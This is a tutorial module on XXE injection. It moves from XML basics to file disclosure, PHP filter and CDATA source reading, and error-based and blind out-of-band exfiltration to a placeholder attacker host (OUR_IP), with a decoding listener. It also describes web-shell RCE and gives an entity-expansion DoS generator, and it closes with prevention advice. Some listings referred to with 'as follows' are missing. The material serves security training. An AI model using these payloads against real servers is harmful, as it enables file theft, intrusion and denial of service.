XML External Entity (XXE) Injection
Intro to XXE
XML
Extensible Markup Language (XML) is a common markup language (similar to HTML and SGML) designed for flexible transfer and storage of data and documents in various types of applications. XML is not focused on displaying data but mostly on storing documents' data and representing data structures. XML documents are formed of element trees, where each element is essentially denoted by a tag, the first element is called the root element, and the other elements are child elements.
Here we see a basic example of an XML document representing an e-mail document structure:
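A minimal sketch of such a document, parsed with Python's standard library to show the element tree. Only the email root and the date element are named in the text; the other elements and all values are illustrative assumptions.

```python
import xml.etree.ElementTree as ET

# Hypothetical e-mail document; only <email> and <date> come from the text.
EMAIL_XML = """<?xml version="1.0" encoding="UTF-8"?>
<email>
  <date>01-01-2022</date>
  <sender>john@example.com</sender>
  <recipients>
    <to>hr@example.com</to>
  </recipients>
  <body>Kindly share the invoice with me.</body>
</email>"""

root = ET.fromstring(EMAIL_XML)      # the root element of the tree
print(root.tag)
for child in root:                   # direct child elements of the root
    print(child.tag, "->", (child.text or "").strip())
```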
The above example shows some of the key elements of an XML document, like:
Tag: The keys of an XML document, usually wrapped with < and > characters. Example: <date>
Entity: XML variables, usually wrapped with & and ; characters. Example: &lt;
Element: The root element or any of its child elements; its value is stored between a start-tag and an end-tag. Example: <date>01-01-2022</date>
Attribute: Optional specifications for any element that are stored in the tags, which may be used by the XML parser. Example: version="1.0" / encoding="UTF-8"
Declaration: Usually the first line of an XML document; it defines the XML version and encoding to use when parsing it. Example: <?xml version="1.0" encoding="UTF-8"?>
Furthermore, some characters are used as part of an XML document structure, like <, >, &, or ". So, if we need to use them in an XML document, we should replace them with their corresponding entity references (e.g. &lt;, &gt;, &amp;, &quot;). Finally, we can write comments in XML documents between <!-- and -->, similar to HTML documents.
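As a small illustration of these entity references, the sketch below escapes and restores the special characters with Python's xml.sax.saxutils helpers. The sample string is an assumption chosen only to contain all four characters.

```python
from xml.sax.saxutils import escape, unescape

raw = 'Tom & Jerry say "1 < 2"'

# escape() always handles &, < and >; the quote mapping is passed explicitly.
encoded = escape(raw, {'"': "&quot;"})
print(encoded)

# unescape() reverses the substitution when given the inverse mapping.
decoded = unescape(encoded, {"&quot;": '"'})
print(decoded == raw)
```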
XML DTD
XML Document Type Definition (DTD) allows the validation of an XML document against a pre-defined document structure. The pre-defined document structure can be defined in the document itself or in an external file. The following is an example DTD for the XML document we saw earlier:
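A sketch of what such a DTD could look like, held in a Python string and attached to a small document. The element list is an assumption chosen to fit an e-mail structure, not the original listing. Python's built-in parser reads the declarations but does not validate the document against them.

```python
from xml.dom import minidom

# Hypothetical DTD for an e-mail document (element names are assumptions).
EMAIL_DTD = """<!DOCTYPE email [
  <!ELEMENT email (date, sender, recipients, body)>
  <!ELEMENT recipients (to+)>
  <!ELEMENT date (#PCDATA)>
  <!ELEMENT sender (#PCDATA)>
  <!ELEMENT to (#PCDATA)>
  <!ELEMENT body (#PCDATA)>
]>"""

DOCUMENT = EMAIL_DTD + """
<email>
  <date>01-01-2022</date>
  <sender>john@example.com</sender>
  <recipients><to>hr@example.com</to></recipients>
  <body>Hello</body>
</email>"""

doc = minidom.parseString(DOCUMENT)
print(doc.doctype.name)              # root element named by the DTD
print(doc.documentElement.tagName)   # actual root element of the document
```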
As we can see, the DTD is declaring the root email element with the ELEMENT type declaration and then denoting its child elements. After that, each of the child elements is also declared, where some of them also have child elements, while others may only contain raw data (as denoted by PCDATA).
The above DTD can be placed within the XML document itself, right after the XML Declaration in the first line. Otherwise, it can be stored in an external file (e.g. email.dtd), and then referenced within the XML document with the SYSTEM keyword, as follows:
It is also possible to reference a DTD through a URL, as follows:
This is similar to how HTML documents reference external JavaScript and CSS files.
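The two reference styles can be sketched as DOCTYPE lines inside Python strings. The file name email.dtd comes from the text, while the host name is a placeholder assumption. Python's minidom only records the system identifier and does not fetch the DTD.

```python
from xml.dom import minidom

# External DTD referenced by file name and by URL (host is a placeholder).
BY_FILE = '<!DOCTYPE email SYSTEM "email.dtd"><email/>'
BY_URL = '<!DOCTYPE email SYSTEM "http://example.com/email.dtd"><email/>'

system_ids = []
for source in (BY_FILE, BY_URL):
    doctype = minidom.parseString(source).doctype
    system_ids.append(doctype.systemId)   # where the parser was told to look
    print(doctype.name, doctype.systemId)
```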
XML Entities
We may also define custom entities (i.e. XML variables) in XML DTDs, to allow refactoring of variables and reduce repetitive data. This can be done with the use of the ENTITY keyword, which is followed by the entity name and its value, as follows:
Once we define an entity, it can be referenced in an XML document between an ampersand & and a semi-colon ; (e.g. &company;). Whenever an entity is referenced, it will be replaced with its value by the XML parser. Most interestingly, however, we can reference External XML Entities with the SYSTEM keyword, which is followed by the external entity's path, as follows:
Note: We may also use the PUBLIC keyword instead of SYSTEM for loading external resources, which is used with publicly declared entities and standards, such as a language code (lang="en"). In this module, we'll be using SYSTEM, but we should be able to use either in most cases.
This works similarly to internal XML entities defined within documents. When we reference an external entity (e.g. &signature;), the parser will replace the entity with its value stored in the external file (e.g. signature.txt). When the XML file is parsed on the server side, in cases like SOAP (XML) APIs or web forms, an entity can reference a file stored on the back-end server, which may eventually be disclosed to us when we reference the entity.
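Both kinds of entity can be sketched locally with Python's standard library. The entity names company and signature and the file name signature.txt come from the text; the file content and the expand_external helper are assumptions. Python's ElementTree expands internal entities on its own, whereas external entities are only resolved here because the sketch installs an explicit handler on the underlying expat parser, which is roughly what a vulnerable parser configuration does implicitly.

```python
import os
import tempfile
import xml.etree.ElementTree as ET
from xml.parsers import expat

# Internal entity: the parser substitutes &company; with its declared value.
INTERNAL = """<!DOCTYPE email [
  <!ENTITY company "Inlane Freight">
]>
<email>&company;</email>"""
internal_text = ET.fromstring(INTERNAL).text
print(internal_text)


def expand_external(xml_text: str, base_dir: str) -> str:
    """Parse xml_text, resolving external entities relative to base_dir."""
    chunks = []
    parser = expat.ParserCreate()
    parser.CharacterDataHandler = chunks.append

    def resolve(context, base, system_id, public_id):
        # Parse the referenced file in place of the entity reference.
        sub = parser.ExternalEntityParserCreate(context)
        with open(os.path.join(base_dir, system_id), "rb") as handle:
            sub.Parse(handle.read(), True)
        return 1

    parser.ExternalEntityRefHandler = resolve
    parser.Parse(xml_text, True)
    return "".join(chunks)


EXTERNAL = """<!DOCTYPE email [
  <!ENTITY signature SYSTEM "signature.txt">
]>
<email>&signature;</email>"""

with tempfile.TemporaryDirectory() as tmp:
    with open(os.path.join(tmp, "signature.txt"), "w") as handle:
        handle.write("-- John")          # hypothetical signature file
    expanded = expand_external(EXTERNAL, tmp)
print(expanded)
```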
Local File Disclosure
In this example, we have an HTTP form that sends its data in XML format and reflects the content of the email node in the response, telling us to check that email for further instructions.
So, let us try to define a new entity and then use it as a variable in the email element to see whether it gets replaced with the value we defined. To do so, we can use what we learned in the previous section for defining new XML entities and add the following lines after the first line in the XML input:
Now, we should have a new XML entity called company, which we can reference with &company;. So, instead of using our email in the email element, let us try using &company;, and see whether it will be replaced with the value we defined (Inlane Freight):
Some web applications may default to a JSON format in HTTP requests, but may still accept other formats, including XML. So, even if a web app sends requests in a JSON format, we can try changing the Content-Type header to application/xml, and then convert the JSON data to XML with an online tool. If the web application does accept the request with XML data, then we may also test it for XXE, which may reveal an unanticipated vulnerability.
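Instead of an online tool, the conversion can also be sketched in a few lines of Python. This is a minimal version for flat JSON objects only; the root element name and the field names are assumptions, and a real endpoint may expect a different layout.

```python
import json
import xml.etree.ElementTree as ET


def json_to_xml(json_text: str, root_name: str = "root") -> str:
    """Convert a flat JSON object into a simple XML document."""
    root = ET.Element(root_name)
    for key, value in json.loads(json_text).items():
        ET.SubElement(root, key).text = str(value)
    return ET.tostring(root, encoding="unicode")


body = json_to_xml('{"name": "test", "email": "test@example.com"}')
headers = {"Content-Type": "application/xml"}   # header sent with the XML body
print(body)
```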
Reading Sensitive Files
Now that we can define new internal XML entities, let's see if we can define external XML entities. Doing so is fairly similar to what we did earlier, but we'll just add the SYSTEM keyword and define the external reference path after it, as we have learned in the previous section:
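A sketch of such a declaration, built with a small Python helper. The helper name is hypothetical, and /etc/passwd is assumed here as a typical world-readable target; the entity and element names follow the earlier company and email example.

```python
def external_entity_doctype(root: str, entity: str, uri: str) -> str:
    """Build a DOCTYPE that declares one external entity pointing at uri."""
    return f'<!DOCTYPE {root} [\n  <!ENTITY {entity} SYSTEM "{uri}">\n]>'


doctype = external_entity_doctype("email", "company", "file:///etc/passwd")
reference = "<email>&company;</email>"   # element whose value gets reflected
print(doctype)
print(reference)
```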
We can refer to the File Inclusion module to see which attacks can be carried out through local file disclosure.
In certain Java web applications, we may also be able to specify a directory instead of a file, and we will get a directory listing instead, which can be useful for locating sensitive files.
Reading Source Code
Another benefit of local file disclosure is the ability to obtain the source code of the web application. This would allow us to perform a Whitebox Penetration Test to unveil more vulnerabilities in the web application, or at the very least reveal secret configurations like database passwords or API keys.
If a file contains some of XML's special characters (e.g. <, >, or &), it would break the external entity reference, and the file's content would not be returned. Furthermore, we cannot read any binary data, as it would also not conform to the XML format.
Luckily, PHP provides wrapper filters that allow us to base64 encode certain resources (including files), in which case the final base64 output should not break the XML format. To do so, instead of using file:// as our reference, we will use PHP's php://filter/ wrapper. With this wrapper, we can specify the convert.base64-encode encoder as our filter, and then add an input resource (e.g. resource=index.php), as follows:
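The wrapper URI and the decoding step can be sketched in Python as follows. The helper name is hypothetical, and the reflected value is simulated locally, since the real value would come from the application's response.

```python
import base64


def php_filter_uri(resource: str) -> str:
    """Return a php://filter URI that base64-encodes the given resource."""
    return f"php://filter/convert.base64-encode/resource={resource}"


uri = php_filter_uri("index.php")
entity = f'<!ENTITY company SYSTEM "{uri}">'
print(entity)

# `reflected` stands in for the base64 text the application would echo back.
reflected = base64.b64encode(b"<?php echo 'hi'; ?>").decode()
source = base64.b64decode(reflected).decode()
print(source)
```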
This trick only works with PHP web applications.
The next section will discuss a more advanced method for reading source code, which should work with any web framework.
Remote Code Execution with XXE
In addition to reading local files, we may be able to gain code execution over the remote server. The easiest method would be to look for SSH keys, or attempt to utilize a hash stealing trick in Windows-based web applications, by making a call to our server.
If these do not work, we may still be able to execute commands on PHP-based web applications through PHP's expect:// wrapper, though this requires the PHP expect module to be installed and enabled.
If the XXE directly prints its output (as shown in this section), then we can execute basic commands such as expect://id, and the page should print the command output. However, if we do not have access to the output, or need to execute a more complicated command (e.g. a reverse shell), then the XML syntax may break and the command may not execute.
The most efficient method to turn XXE into RCE is by fetching a web shell from our server and writing it to the web app, and then we can interact with it to execute commands. To do so, we can start by writing a basic PHP web shell and starting a python web server, as follows:
Now, we can use the following XML code to execute a curl command that downloads our web shell into the remote server:
We replaced all spaces in the above XML code with $IFS to avoid breaking the XML syntax. Furthermore, many other characters like |, >, and { may break the code, so we should avoid using them.
Once we send the request, we should receive a request on our machine for the shell.php file, after which we can interact with the web shell on the remote server for code execution.
The expect module is not enabled/installed by default on modern PHP servers, so this attack may not always work. This is why XXE is usually used to disclose sensitive local files and source code, which may reveal additional vulnerabilities or ways to gain code execution.
Other XXE Attacks
Another common attack often carried out through XXE vulnerabilities is SSRF exploitation, which is used to enumerate locally open ports and access their pages, among other restricted web pages.
Finally, one common use of XXE attacks is causing a Denial of Service (DOS) to the hosting web server, using the following payload:
This payload defines the a0 entity as DOS, references it in a1 multiple times, references a1 in a2, and so on until the back-end server's memory runs out due to the self-reference loops. However, this attack no longer works with modern web servers (e.g., Apache), as they protect against entity self-reference.
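To see why the nesting is so costly, the growth can be sketched with a deliberately tiny instance. The helper names and the choice of two levels with three references each are assumptions; the a0, a1, a2 naming and the DOS value follow the description above. Each level multiplies the expanded size by the number of references, so the size grows exponentially with the nesting depth.

```python
import xml.etree.ElementTree as ET


def nested_entities(levels: int, refs: int, base: str = "DOS") -> str:
    """Build a DOCTYPE where each entity references the previous one `refs` times."""
    lines = [f'  <!ENTITY a0 "{base}">']
    for i in range(1, levels + 1):
        body = f"&a{i - 1};" * refs
        lines.append(f'  <!ENTITY a{i} "{body}">')
    return "<!DOCTYPE email [\n" + "\n".join(lines) + "\n]>"


def expanded_size(levels: int, refs: int, base: str = "DOS") -> int:
    """Characters produced when the top-level entity is fully expanded."""
    return len(base) * refs ** levels


# Tiny, harmless instance: 2 levels with 3 references each.
small = nested_entities(2, 3) + "<email>&a2;</email>"
small_len = len(ET.fromstring(small).text)
print(small_len, expanded_size(2, 3))

# The same structure with 10 levels of 10 references, computed but not parsed.
print(expanded_size(10, 10))
```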
Advanced File Disclosure
Not all XXE vulnerabilities are straightforward to exploit. Some file formats may not be readable through basic XXE, while in other cases the web application may not output any of our input values, so we may try to force the output through errors.
Advanced Exfiltration with CDATA
In the previous section, we saw how we could use PHP filters to base64 encode PHP source files so that they would not break the XML format when referenced, which would otherwise prevent us from reading them. But what about other types of web applications? We can utilize another method to extract any kind of data (including binary data) for any web application back-end. To output data that does not conform to the XML format, we can wrap the content of the external file reference with a CDATA tag (e.g. <![CDATA[ FILE_CONTENT ]]>). This way, the XML parser would consider this part raw data, which may contain any type of data, including any special characters.
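The effect of the CDATA wrapper can be checked locally with a short Python sketch. The sample source line is an assumption chosen to contain XML's special characters.

```python
import xml.etree.ElementTree as ET

# Hypothetical file content containing <, > and & characters.
source = 'if ($a < 1 && $b > 2) { echo "x"; }'

try:
    ET.fromstring(f"<root>{source}</root>")
    raw_ok = True
except ET.ParseError:
    raw_ok = False     # the special characters break the document

# Wrapped in CDATA, the same content is treated as raw character data.
wrapped = ET.fromstring(f"<root><![CDATA[{source}]]></root>")
print(raw_ok, wrapped.text == source)
```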
One easy way to tackle this issue would be to define a begin internal entity with <![CDATA[, an end internal entity with ]]>, and then place our external entity file in between, and it should be considered as a CDATA element, as follows:
After that, if we reference the &joined; entity, it should contain our escaped data. However, this will not work, since XML prevents joining internal and external entities, so we will have to find a better way to do so.
To bypass this limitation, we can utilize XML Parameter Entities, a special type of entity that starts with a % character and can only be used within the DTD.
What's unique about parameter entities is that if we reference them from an external source (e.g., our own server), then all of them would be considered as external and can be joined, as follows:
So, let's try to read the submitDetails.php file by first storing the above line in a DTD file (e.g. xxe.dtd), hosting it on our machine, and then referencing it as an external entity on the target web application, as follows:
Now, we can reference our external entity (xxe.dtd) and then print the &joined; entity we defined above, which should contain the content of the submitDetails.php file, as follows:
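Put together, the two pieces could look like the following sketch, held in Python strings so they can be written to disk or sent in a request. OUR_IP:8000 is a placeholder for our own host, the parameter entity name xxe is an assumption, and the file path assumes the default web root mentioned later in this section.

```python
OUR_HOST = "OUR_IP:8000"   # placeholder for the machine hosting xxe.dtd

# Content of xxe.dtd: joins the three parameter entities into one entity.
XXE_DTD = '<!ENTITY joined "%begin;%file;%end;">'

# XML sent to the target: declares the parts, loads xxe.dtd, prints &joined;.
PAYLOAD = f"""<!DOCTYPE email [
  <!ENTITY % begin "<![CDATA[">
  <!ENTITY % file SYSTEM "file:///var/www/html/submitDetails.php">
  <!ENTITY % end "]]>">
  <!ENTITY % xxe SYSTEM "http://{OUR_HOST}/xxe.dtd">
  %xxe;
]>
<email>&joined;</email>"""

print(XXE_DTD)
print(PAYLOAD)
```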
Once we write our xxe.dtd file, host it on our machine, and then add the above lines to our HTTP request to the vulnerable web application, we can finally get the content of the submitDetails.php file:
As we can see, we were able to obtain the file's source code without needing to encode it to base64, which saves a lot of time when going through various files to look for secrets and passwords.
In some modern web servers, we may not be able to read some files (like index.php), as the web server would be preventing a DOS attack caused by file/entity self-reference (i.e., XML entity reference loop), as mentioned in the previous section.
This trick can become very handy when the basic XXE method does not work or when dealing with other web development frameworks.
Error Based XXE
Another situation we may find ourselves in is one where the web application might not write any output, so we cannot control any of the XML input entities to write its content. In such cases, we would be blind to the XML output and so would not be able to retrieve the file content using our usual methods.
If the web application displays runtime errors (e.g., PHP errors) and does not have proper exception handling for the XML input, then we can use this flaw to read the output of the XXE exploit. If the web application neither writes XML output nor displays any errors, we would face a completely blind situation, which we will discuss in the next section.
First, let's try to send malformed XML data, and see if the web application displays any errors. To do so, we can delete any of the closing tags, change one of them so it does not close (e.g. <roo> instead of <root>), or just reference a non-existing entity, as follows:
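The two kinds of malformed input can be reproduced locally with a short Python sketch. The element names are assumptions; the messages printed here come from Python's parser and only illustrate the sort of detail a verbose application might leak, not what the target's PHP parser would print.

```python
import xml.etree.ElementTree as ET

SAMPLES = {
    "mismatched tag": "<root><email>test</emai></root>",
    "undefined entity": "<root><email>&nonExistingEntity;</email></root>",
}

errors = {}
for label, document in SAMPLES.items():
    try:
        ET.fromstring(document)
    except ET.ParseError as exc:
        errors[label] = str(exc)   # parser message, including the position

for label, message in errors.items():
    print(label, "->", message)
```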
We see that we did indeed cause the web application to display an error, and it also revealed the web server directory, which we can use to read the source code of other files. Now, we can exploit this flaw to exfiltrate file content. To do so, we will use a similar technique to what we used earlier. First, we will host a DTD file that contains the following payload:
The above payload defines the file parameter entity and then joins it with an entity that does not exist. In our previous exercise, we were joining three strings. In this case, %nonExistingEntity; does not exist, so the web application would throw an error saying that this entity does not exist, along with our joined %file; as part of the error. There are many other variables that can cause an error, like a bad URI or having bad characters in the referenced file.
Now, we can call our external DTD script, and then reference the error entity, as follows:
Once we host our DTD script as we did earlier and send the above payload as our XML data (no need to include any other XML data), we will get the content of the /etc/hosts file as follows:
This method may also be used to read the source code of files. All we have to do is change the file name in our DTD script to point to the file we want to read (e.g. "file:///var/www/html/submitDetails.php"). However, this method is not as reliable as the previous method for reading source files, as it may have length limitations, and certain special characters may still break it.
Blind Data Exfiltration
Out-of-band Data Exfiltration
When the web application neither writes XML output nor displays errors, we can utilize a method known as Out-of-band (OOB) Data Exfiltration, which is often used in similar blind cases with many web attacks, like blind SQL injections, blind command injections, blind XSS, and of course, blind XXE.
Our previous attacks were already partly out-of-band, since we hosted the DTD file on our machine and made the web application connect to us. So, our attack this time will be pretty similar, with one significant difference. Instead of having the web application output our file entity to a specific XML entity, we will make the web application send a web request to our web server with the content of the file we are reading.
To do so, we can first use a parameter entity for the content of the file we are reading while utilizing a PHP filter to base64 encode it. Then, we will create another external parameter entity that references our IP, and place the file parameter value as part of the URL being requested over HTTP, as follows:
We can even write a simple PHP script that automatically detects the encoded file content, decodes it, and outputs it to the terminal:
So, we will first write the above PHP code to index.php, and then start a PHP server on port 8000, as follows:
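For readers who prefer Python over PHP on the listening side, a roughly equivalent listener can be sketched with the standard library. This is an alternative under assumptions, not the script from the text: the query parameter name content and the function names are hypothetical, and the data is assumed to arrive as padded base64.

```python
import base64
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Optional
from urllib.parse import parse_qs, urlparse


def decode_content(path: str) -> Optional[str]:
    """Return the decoded `content` query parameter of a request path, if any."""
    values = parse_qs(urlparse(path).query).get("content")
    if not values:
        return None
    # parse_qs turns "+" into a space, so restore it before decoding.
    encoded = values[0].replace(" ", "+")
    return base64.b64decode(encoded).decode(errors="replace")


class ExfilHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        decoded = decode_content(self.path)
        if decoded is not None:
            print(decoded)              # show the decoded file content
        self.send_response(200)
        self.end_headers()


def serve(port: int = 8000) -> None:
    """Listen for incoming requests until interrupted."""
    HTTPServer(("0.0.0.0", port), ExfilHandler).serve_forever()
```

Calling serve() starts the listener on port 8000; requests without a content parameter, such as the fetch of the DTD file itself, are acknowledged but not printed.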
Now, to initiate our attack, we can use a similar payload to the one we used in the error-based attack, and simply add <root>&content;</root>, which is needed to reference our entity and have it send the request to our machine with the file content:
Then, we can send our request to the web application:
Finally, we can go back to our terminal, and we will see that we did indeed get the request and its decoded content.
In addition to storing our base64 encoded data as a parameter to our URL, we may utilize DNS OOB Exfiltration by placing the encoded data as a sub-domain for our URL (e.g. ENCODEDTEXT.our.website.com), and then use a tool like tcpdump to capture any incoming traffic and decode the sub-domain string to get the data. Granted, this method is more advanced and requires more effort to exfiltrate data through.
Automated OOB Exfiltration
Although in some instances we may have to use the manual method we learned above, in many other cases, we can automate the process of blind XXE data exfiltration with tools. One such tool is XXEinjector. This tool supports most of the tricks we learned in this module, including basic XXE, CDATA source exfiltration, error-based XXE, and blind OOB XXE.
To use this tool for automated OOB exfiltration, we can first clone the tool to our machine, as follows:
Once we have the tool, we can copy the HTTP request from Burp and write it to a file for the tool to use. We should not include the full XML data, only the first line, and write XXEINJECT after it as a position locator for the tool:
Now, we can run the tool with the --host/--httpport flags being our IP and port, the --file flag being the file we wrote above, and the --path flag being the file we want to read. We will also select the --oob=http and --phpfilter flags to repeat the OOB attack we did above, as follows:
We see that the tool did not directly print the data. This is because we are base64 encoding the data, so it does not get printed. In any case, all exfiltrated files get stored in the Logs folder under the tool, and we can find our file there:
XXE Prevention
We have seen that XXE vulnerabilities mainly occur when an unsafe XML input references an external entity, which is eventually exploited to read sensitive files and perform other actions. Preventing XXE vulnerabilities is relatively easier than preventing other web vulnerabilities, as they are caused mainly by outdated XML libraries.
Avoiding Outdated Components
While other input validation web vulnerabilities are usually prevented through secure coding practices (e.g., XSS, IDOR, SQLi, OS Injection), this is not entirely necessary to prevent XXE vulnerabilities. This is because XML input is usually not handled manually by the web developers but by the built-in XML libraries instead. So, if a web application is vulnerable to XXE, this is very likely due to an outdated XML library that parses the XML data.
For example, PHP's libxml_disable_entity_loader function is deprecated since it allows a developer to enable external entities in an unsafe manner, which leads to XXE vulnerabilities. If we visit PHP's documentation for this function, we see the following warning:
Warning
This function has been DEPRECATED as of PHP 8.0.0. Relying on this function is highly discouraged.
Note: You can find a detailed report of all vulnerable XML libraries, with recommendations on updating them and using safe functions, in OWASP's XXE Prevention Cheat Sheet.
In addition to updating the XML libraries, we should also update any components that parse XML input, such as API libraries like SOAP. Furthermore, any document or file processors that may perform XML parsing, like SVG image processors or PDF document processors, may also be vulnerable to XXE vulnerabilities, and we should update them as well.
These issues are not exclusive to XML libraries, as the same applies to all other web components (e.g., outdated Node Modules). In addition to common package managers (e.g. npm), common code editors will notify web developers of the use of outdated components and suggest other alternatives. In the end, using the latest XML libraries and web development components can greatly help reduce various web vulnerabilities, including XXE.
Using Safe XML Configurations
Other than using the latest XML libraries, certain XML configurations for web applications can help reduce the possibility of XXE exploitation. These include:
Disable referencing custom Document Type Definitions (DTDs)
Disable referencing External XML Entities
Disable Parameter Entity processing
Disable support for XInclude
Prevent Entity Reference Loops
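As one illustration of the first item, the sketch below refuses any input that carries a DOCTYPE before handing it to the regular parser. It uses Python's standard library purely as an example; the function and exception names are hypothetical, and other languages and XML libraries expose their own switches for the same settings.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DTDForbidden(ValueError):
    """Raised when untrusted XML carries a DOCTYPE declaration."""


def parse_untrusted(xml_text: str) -> ET.Element:
    """Parse XML only if it declares no DTD (and therefore no custom entities)."""
    def forbid(name, system_id, public_id, has_internal_subset):
        raise DTDForbidden(f"DOCTYPE {name!r} is not allowed")

    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = forbid
    checker.Parse(xml_text, True)    # raises as soon as a DOCTYPE starts
    return ET.fromstring(xml_text)
```

Rejecting the DOCTYPE outright is the bluntest of the listed options: it also blocks legitimate documents that ship a DTD, which is usually acceptable for request bodies in web applications.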
Another thing we saw was Error-based XXE exploitation. So, we should always have proper exception handling in our web applications and should always disable displaying runtime errors in web servers.
Such configurations should be another layer of protection if we miss updating some XML libraries and should also prevent XXE exploitation. However, we may still be using vulnerable libraries in such cases and only applying workarounds against exploitation, which is not ideal.
With the various issues and vulnerabilities introduced by XML data, many also recommend using other formats, such as JSON or YAML. This also includes avoiding API standards that rely on XML (e.g., SOAP) and using JSON-based APIs instead (e.g., REST).
Finally, using Web Application Firewalls (WAFs) is another layer of protection against XXE exploitation. However, we should never entirely rely on WAFs and leave the back-end vulnerable, as WAFs can always be bypassed.